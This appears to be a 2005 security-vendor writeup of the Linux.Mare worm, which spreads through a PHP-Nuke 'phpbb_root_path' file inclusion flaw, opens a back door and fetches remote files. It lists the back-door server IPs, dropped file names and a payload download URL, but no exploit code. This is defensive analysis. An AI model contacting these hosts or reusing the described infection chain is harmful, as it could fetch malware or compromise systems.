Discovered: December 24, 2005
Updated: December 24, 2005 11:11:17 AM
Systems Affected: Linux
Linux.Mare is a worm that spreads by exploiting the PHP-Nuke "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm opens a back door and downloads and executes remote files on the compromised computer
Once executed, the worm attempts to open a back door by connecting to the following servers:
81.223.104.152
24.224.174.18
The worm may receive the following commands from the remote attacker through the back door:
Update the worm
Execute files
Terminate the worm
The worm then downloads and executes the following executable file from the above servers:
listen
If the above file already exists on the compromised computer the worm will download the following file, which is an updated version of the program:
update.listen
The worm logs its activities to the following file:
listen.log
The worm attempts to exploit the PHP-Nuke "phpbb_root_path" Arbitrary File Inclusion. If successful, the worm downloads and executes a file from the following location:
http://209.136.48.69/cvac
Writeup By: Kaoru Hayashi
Technorati
Digg
Delicious
Reddit
StumbleUpon
Yahoo Buzz
Twitter
Facebook
Newsvine
